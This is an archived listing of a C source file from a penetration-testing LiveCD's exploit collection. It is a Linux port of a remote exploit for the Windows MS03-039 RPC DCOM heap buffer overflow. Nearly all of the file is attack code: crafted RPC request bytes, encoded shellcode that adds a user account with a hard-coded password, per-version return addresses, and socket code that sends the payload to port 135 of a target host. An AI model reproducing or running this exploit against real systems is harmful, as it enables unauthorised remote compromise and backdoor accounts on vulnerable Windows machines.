home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / microsoft / remote / MS03-039-linux.c < prev    next >
Encoding:
C/C++ Source or Header  |  2005-02-12  |  13.8 KB  |  415 lines
  1. <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
  2. <!-- saved from url=(0060)http://packetstormsecurity.nl/0309-exploits/MS03-039-linux.c -->
  3. <HTML><HEAD>
  4. <META http-equiv=Content-Type content="text/html; charset=windows-1252">
  5. <META content="MSHTML 6.00.2800.1226" name=GENERATOR></HEAD>
  6. <BODY><PRE>#include <stdio.h>
  7. #include <stdlib.h>
  8. #include <sys/types.h>
  9. #include <sys/socket.h>
  10. #include <netinet/in.h>
  11. #include <arpa/inet.h>
  12. #include <unistd.h>
  13. #include <netdb.h>
  14. #include <fcntl.h>
  15. #include <unistd.h>
  16.  
  17. /* xfocus start */
  18.  
  19. unsigned char bindstr[]={
  20. 0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00
  21. ,
  22. 0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00
  23. ,
  24. 0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46
  25. ,0x00,
  26. 0x00,0x00,0x00,
  27. 0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
  28. 0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};
  29.  
  30. unsigned char request1[]={
  31. 0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03
  32. ,0x00,0x00,0xE5,0x00,0x00,0x00,0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,0x05,0x0
  33. 0
  34. ,0x06,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xFD,0xCC,0x4
  35. 5
  36. ,0x64,0x49,0xB0,0x70,0xDD,0xAE,0x74,0x2C,0x96,0xD2,0x60,0x5E,0x0D,0x00,0x01,0x0
  37. 0
  38. ,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x5E,0x0D,0x00,0x02,0x00,0x00,0x00,0x7C,0x5
  39. E
  40. ,0x0D,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x80,0x96,0xF1,0xF1,0x2A,0x4
  41. D
  42. ,0xCE,0x11,0xA6,0x6A,0x00,0x20,0xAF,0x6E,0x72,0xF4,0x0C,0x00,0x00,0x00,0x4D,0x4
  43. 1
  44. ,0x52,0x42,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x0
  45. 0
  46. ,0x00,0x00,0xA8,0xF4,0x0B,0x00,0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,0x4D,0x4
  47. 5
  48. ,0x4F,0x57,0x04,0x00,0x00,0x00,0xA2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x0
  49. 0
  50. ,0x00,0x00,0x00,0x00,0x00,0x46,0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x0
  51. 0
  52. ,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,0x28,0x0
  53. 3
  54. ,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0xC8,0x0
  55. 0
  56. ,0x00,0x00,0x4D,0x45,0x4F,0x57,0x28,0x03,0x00,0x00,0xD8,0x00,0x00,0x00,0x00,0x0
  57. 0
  58. ,0x00,0x00,0x02,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0
  59. 0
  60. ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xC4,0x28,0xCD,0x00,0x64,0x2
  61. 9
  62. ,0xCD,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0xB9,0x01,0x00,0x00,0x00,0x0
  63. 0
  64. ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAB,0x01,0x00,0x00,0x00,0x0
  65. 0
  66. ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA5,0x01,0x00,0x00,0x00,0x0
  67. 0
  68. ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA6,0x01,0x00,0x00,0x00,0x0
  69. 0
  70. ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA4,0x01,0x00,0x00,0x00,0x0
  71. 0
  72. ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAD,0x01,0x00,0x00,0x00,0x0
  73. 0
  74. ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAA,0x01,0x00,0x00,0x00,0x0
  75. 0
  76. ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x07,0x00,0x00,0x00,0x60,0x0
  77. 0
  78. ,0x00,0x00,0x58,0x00,0x00,0x00,0x90,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x20,0x0
  79. 0
  80. ,0x00,0x00,0x78,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x1
  81. 0
  82. ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x50,0x00,0x00,0x00,0x4F,0xB6,0x88,0x20,0xFF,0xF
  83. F
  84. ,0xFF,0xFF,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0
  85. 0
  86. ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0
  87. 0
  88. ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0
  89. 0
  90. ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0
  91. 0
  92. ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x1
  93. 0
  94. ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x48,0x00,0x00,0x00,0x07,0x00,0x66,0x00,0x06,0x0
  95. 9
  96. ,0x02,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x10,0x0
  97. 0
  98. ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x0
  99. 0
  100. ,0x00,0x00,0x78,0x19,0x0C,0x00,0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x00,0x01,0x0
  101. 0
  102. ,0x00,0x00,0x70,0xD8,0x98,0x93,0x98,0x4F,0xD2,0x11,0xA9,0x3D,0xBE,0x57,0xB2,0x0
  103. 0
  104. ,0x00,0x00,0x32,0x00,0x31,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x80,0x0
  105. 0
  106. ,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0
  107. 0
  108. ,0x00,0x00,0x00,0x00,0x00,0x00,0x18,0x43,0x14,0x00,0x00,0x00,0x00,0x00,0x60,0x0
  109. 0
  110. ,0x00,0x00,0x60,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,0xC0,0x0
  111. 1
  112. ,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x3B,0x0
  113. 3
  114. ,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x0
  115. 0
  116. ,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x01,0x00,0x81,0xC5,0x17,0x03,0x80,0x0
  117. E
  118. ,0xE9,0x4A,0x99,0x99,0xF1,0x8A,0x50,0x6F,0x7A,0x85,0x02,0x00,0x00,0x00,0x00,0x0
  119. 0
  120. ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0
  121. 0
  122. ,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x30,0x0
  123. 0
  124. ,0x00,0x00,0x78,0x00,0x6E,0x00,0x00,0x00,0x00,0x00,0xD8,0xDA,0x0D,0x00,0x00,0x0
  125. 0
  126. ,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x2F,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x0
  127. 0
  128. ,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x46,0x0
  129. 0
  130. ,0x58,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x10,0x0
  131. 0
  132. ,0x00,0x00,0x30,0x00,0x2E,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0
  133. 0
  134. ,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x68,0x0
  135. 0
  136. ,0x00,0x00,0x0E,0x00,0xFF,0xFF,0x68,0x8B,0x0B,0x00,0x02,0x00,0x00,0x00,0x00,0x0
  137. 0
  138. ,0x00,0x00,0x00,0x00,0x00,0x00};
  139.  
  140. unsigned char request2[]={
  141. 0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00
  142. ,0x00,0x00,0x5C,0x00,0x5C,0x00};
  143.  
  144. unsigned char request3[]={
  145. 0x5C,0x00
  146. ,0x43,0x00,0x24,0x00,0x5C,0x00,0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x00,0x35,0x0
  147. 0
  148. ,0x36,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x0
  149. 0
  150. ,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x0
  151. 0
  152. ,0x2E,0x00,0x64,0x00,0x6F,0x00,0x63,0x00,0x00,0x00};
  153.  
  154. //user="e" pass="asd#321"
  155. unsigned char sc_add_user[]=
  156. "\xEB\x10\x5A\x4A\x33\xC9\x66\xB9\x3E\x01\x80\x34\x0A\x99\xE2\xFA"
  157. "\xEB\x05\xE8\xEB\xFF\xFF\xFF\x70\x31\x99\x99\x99\xC3\x21\x95\x69"
  158. "\x64\xE6\x12\x99\x12\xE9\x85\x34\x12\xD9\x91\x12\x41\x12\xEA\xA5"
  159. "\x9A\x6A\x12\xEF\xE1\x9A\x6A\x12\xE7\xB9\x9A\x62\x12\xD7\x8D\xAA"
  160. "\x74\xCF\xCE\xC8\x12\xA6\x9A\x62\x12\x6B\xF3\x97\xC0\x6A\x3F\xED"
  161. "\x91\xC0\xC6\x1A\x5E\x9D\xDC\x7B\x70\xC0\xC6\xC7\x12\x54\x12\xDF"
  162. "\xBD\x9A\x5A\x48\x78\x9A\x58\xAA\x50\xFF\x12\x91\x12\xDF\x85\x9A"
  163. "\x5A\x58\x78\x9B\x9A\x58\x12\x99\x9A\x5A\x12\x63\x12\x6E\x1A\x5F"
  164. "\x97\x12\x49\xF3\x9A\xC0\x71\xBD\x99\x99\x99\xF1\x66\x66\x66\x99"
  165. "\xF1\x99\x89\x99\x99\xF3\x9D\x66\xCE\x6D\x22\x81\x69\x64\xE6\x10"
  166. "\x9A\x1A\x5F\x95\xAA\x59\xC9\xCF\x66\xCE\x61\xC9\x66\xCE\x65\xAA"
  167. "\x59\x35\x1C\x59\xEC\x60\xC8\xCB\xCF\xCA\x66\x4B\xC3\xC0\x32\x7B"
  168. "\x77\xAA\x59\x5A\x71\xCA\x66\x66\x66\xDE\xFC\xED\xC9\xEB\xF6\xFA"
  169. "\xD8\xFD\xFD\xEB\xFC\xEA\xEA\x99\xD1\xFC\xF8\xE9\xDA\xEB\xFC\xF8"
  170. "\xED\xFC\x99\xCE\xF0\xF7\xDC\xE1\xFC\xFA\x99\xDC\xE1\xF0\xED\xC9"
  171. "\xEB\xF6\xFA\xFC\xEA\xEA\x99\xFA\xF4\xFD\xB9\xB6\xFA\xB9\xF7\xFC"
  172. "\xED\xB9\xEC\xEA\xFC\xEB\xB9\xFC\xB9\xF8\xEA\xFD\xBA\xAA\xAB\xA8"
  173. "\xB9\xB6\xF8\xFD\xFD\xB9\xBF\xBF\xB9\xF7\xFC\xED\xB9\xF5\xF6\xFA"
  174. "\xF8\xF5\xFE\xEB\xF6\xEC\xE9\xB9\xF8\xFD\xF4\xF0\xF7\xF0\xEA\xED"
  175. "\xEB\xF8\xED\xF6\xEB\xEA\xB9\xFC\xB9\xB6\xF8\xFD\xFD\x99";
  176. #define sc_offset               0x24
  177. #define sc_max                  0x208
  178. #define jmp_addr_offset sc_max+sc_offset+0x8
  179. #define top_seh_offset  jmp_addr_offset+0x4
  180.  
  181. unsigned char sc[]=
  182. "\x31\x00\x32\x00\x37\x00\x2e\x00\x30\x00\x2e\x00"
  183. "\x30\x00\x2e\x00\x31\x00\x5c\x00\x49\x00\x50\x00"
  184. "\x43\x00\x24\x00\x5c\x00"
  185. "EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"
  186. "EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"
  187. "EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"
  188. "EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"
  189. "EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"
  190. "EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"
  191. "EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"
  192. "EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"
  193. "EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"
  194. "EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"
  195. "EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"
  196. "\xe9\xf3\xfd\xff\xff"
  197. "EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE";
  198.  
  199. unsigned char request4[]={
  200. 0x01,0x10
  201. ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x20,0x00,0x00,0x00,0x30,0x00,0x2D,0x00,0x00,0x0
  202. 0
  203. ,0x00,0x00,0x88,0x2A,0x0C,0x00,0x02,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x28,0x8
  204. C
  205. ,0x0C,0x00,0x01,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00
  206. };
  207. /* end xfocus */
  208.  
  209. int type=0;
  210. struct
  211. {
  212.         char    *os;
  213.         u_long   dwTopSeh;
  214.         char    *seh;
  215.         u_long   dwJmpAddr;
  216.         char    *jmp;
  217. }
  218. targets[] =
  219. {
  220.         { "2kEnSp4+MS03-026",
  221.                 0x7c54144c,
  222.                 "kernel32.dll v5.0.2195.6688",
  223.                 0x77a1b496,
  224.                 "OLEAUT32.dll v2.40.4522.0"},
  225.         { "2kEnSp3+SomeHotFixs+MS03-026",
  226.                 0x77eda1f0,
  227.                 "kernel32.dll v5.0.2195.6079",
  228.                 0x77a1afa9,
  229.                 "OLEAUT32.dll v2.40.4518.0"}
  230. }, v;
  231.  
  232.  
  233.  
  234.  
  235. int main(int argc,char ** argv)
  236. {
  237.     int len,len1, sockfd, c, a;
  238.     unsigned long ret;
  239.         struct sockaddr_in addr_in;
  240.     unsigned short port=135;
  241.     unsigned char buf1[0x1000];
  242.     unsigned char buf2[0x1000];
  243.     int     i, iType;
  244.         struct hostent *he;
  245.         static char *hostname=NULL;
  246.  
  247.  
  248.  
  249.  
  250.         printf( "MS03-039 RPC DCOM long filename heap buffer overflow exp v1\n"
  251.                         "Base on flashsky's MS03-026 exp\n"
  252.                         "Code by ey4s<eyas#xfocus.org>\n"
  253.                                                 "Ported to linux by nulluid\n"
  254.                         "If success, target will add a user \"e\" and password 
  255. is \"asd#321\"\n\n");
  256.  
  257.         if(argc!=3)
  258.         {
  259.                 printf("Usage: %s <target> <type>\n", argv[0]);
  260.                                         for(i = 0; i < sizeof(targets)/sizeof(v
  261. ); i++)
  262.                         printf( "<%d>   %s\n"
  263.                                         "      TopSeh=0x%.8x in %s\n"
  264.                                         "      JmpAddr=0x%.8x in %s\n",
  265.                                         i, targets[i].os,
  266.                                         targets[i].dwTopSeh, targets[i].seh,
  267.                                         targets[i].dwJmpAddr, targets[i].jmp);
  268.                 return(1);
  269.         }
  270.  
  271.         iType = atoi(argv[2]);
  272.         if((iType<0) || iType > sizeof(targets)/sizeof(v))
  273.         {
  274.                 printf("[-] Wrong type.\n");
  275.                 return;
  276.         }
  277.  
  278.         hostname = argv[1];
  279.  
  280.  
  281.         if(hostname==NULL)
  282.     {
  283.       printf("[-] Please enter a hostname with -d\n");
  284.       exit(1);
  285.     }
  286.  
  287.     printf("RPC DCOM remote exploit - .:[rootzero.net]:. - nulluid\n");
  288.     printf("[+] Resolving host..\n");
  289.  
  290.     if((he = gethostbyname(hostname)) == NULL)
  291.     {
  292.       printf("[-] gethostbyname: Couldnt resolve hostname\n");
  293.       exit(1);
  294.     }
  295.  
  296.  
  297.  
  298.     /* drg */   
  299.  
  300.     memcpy(&sc[sc_offset], sc_add_user, sizeof(sc_add_user));
  301.     memcpy(&sc[jmp_addr_offset], &targets[iType].dwJmpAddr,4);
  302.     memcpy(&sc[top_seh_offset], &targets[iType].dwTopSeh,4);
  303.     printf("[+] Prepare shellcode completed.\n");
  304.  
  305.  
  306.     memcpy(sc+36, (unsigned char *) ret, 4);
  307.  
  308.     addr_in.sin_family = AF_INET;
  309.     addr_in.sin_addr = *((struct in_addr *)he->h_addr);
  310.     addr_in.sin_port = htons(port);
  311.  
  312.  
  313.     if ((sockfd=socket(AF_INET,SOCK_STREAM,0)) == -1)
  314.     {
  315.         perror("[-] Socket failed");
  316.         return(0);
  317.     }
  318.     
  319.     if(connect(sockfd,(struct sockaddr *)&addr_in, sizeof(struct sockaddr)) == 
  320. -1)
  321.     {
  322.         perror("[-] Connect failed");
  323.         return(0);
  324.     }
  325.  
  326.         printf("[+] Connect to %s:135 success.\n", argv[1]);
  327.  
  328.         if(sizeof(sc_add_user) > sc_max)
  329.         {
  330.                 printf("[-] shellcode too long, exit.\n");
  331.                 return;
  332.         }
  333.  
  334.  
  335.  
  336.                     /* xfocus start */
  337.     len=sizeof(sc);
  338.     memcpy(buf2,request1,sizeof(request1));
  339.     len1=sizeof(request1);
  340.     
  341.     *(unsigned long *)(request2)=*(unsigned long *)(request2)+sizeof(sc)/2;  
  342.     *(unsigned long *)(request2+8)=*(unsigned long *)(request2+8)+sizeof(sc)/2;
  343.     
  344.     memcpy(buf2+len1,request2,sizeof(request2));
  345.     len1=len1+sizeof(request2);
  346.     memcpy(buf2+len1,sc,sizeof(sc));
  347.     len1=len1+sizeof(sc);
  348.     memcpy(buf2+len1,request3,sizeof(request3));
  349.     len1=len1+sizeof(request3);
  350.     memcpy(buf2+len1,request4,sizeof(request4));
  351.     len1=len1+sizeof(request4);
  352.     
  353.     *(unsigned long *)(buf2+8)=*(unsigned long *)(buf2+8)+sizeof(sc)-0xc;
  354.     
  355.  
  356.     *(unsigned long *)(buf2+0x10)=*(unsigned long *)(buf2+0x10)+sizeof(sc)-0xc;
  357.   
  358.     *(unsigned long *)(buf2+0x80)=*(unsigned long *)(buf2+0x80)+sizeof(sc)-0xc;
  359.     *(unsigned long *)(buf2+0x84)=*(unsigned long *)(buf2+0x84)+sizeof(sc)-0xc;
  360.     *(unsigned long *)(buf2+0xb4)=*(unsigned long *)(buf2+0xb4)+sizeof(sc)-0xc;
  361.     *(unsigned long *)(buf2+0xb8)=*(unsigned long *)(buf2+0xb8)+sizeof(sc)-0xc;
  362.     *(unsigned long *)(buf2+0xd0)=*(unsigned long *)(buf2+0xd0)+sizeof(sc)-0xc;
  363.     *(unsigned long *)(buf2+0x18c)=*(unsigned long *)(buf2+0x18c)+sizeof(sc)-0x
  364. c;
  365.     /* end xfocus */
  366.  
  367.  
  368.  
  369.         len=send(sockfd,bindstr,sizeof(bindstr),0);
  370.     if(len<=0)
  371.         {
  372.             perror("[-] Send failed");
  373.             return(1);
  374.     }
  375.         else 
  376.                 printf("[+] send %d bytes.\n", len);
  377.  
  378.  
  379.     len=recv(sockfd, buf1, 1000, 0);
  380.         if(len<=0)
  381.     {
  382.             printf("[-] recv error\n");
  383.             return(1);
  384.     }
  385.     else
  386.             printf("[+] recv %d bytes.\n", len);
  387.     
  388.  
  389.     len = send(sockfd,buf2,len1,0);
  390.         if(len<=0)
  391.     {
  392.             printf("[-] Send failed.\n");
  393.             return(1);
  394.     }
  395.         else
  396.                 printf("[+] send %d bytes.\n", len);
  397.  
  398.  
  399.         len=recv(sockfd,buf1,1024,0);
  400.         if(len<=0)
  401.         {
  402.                 printf("[+] Target crash or exploit success? :)\n");
  403.         }
  404.         else
  405.                 printf("[-] recv %d bytes. Bad luck!\n", len);
  406.         
  407.         return(0);
  408.  
  409. }
  410.  
  411.  
  412.  
  413.  
  414. </PRE></BODY></HTML>
  415.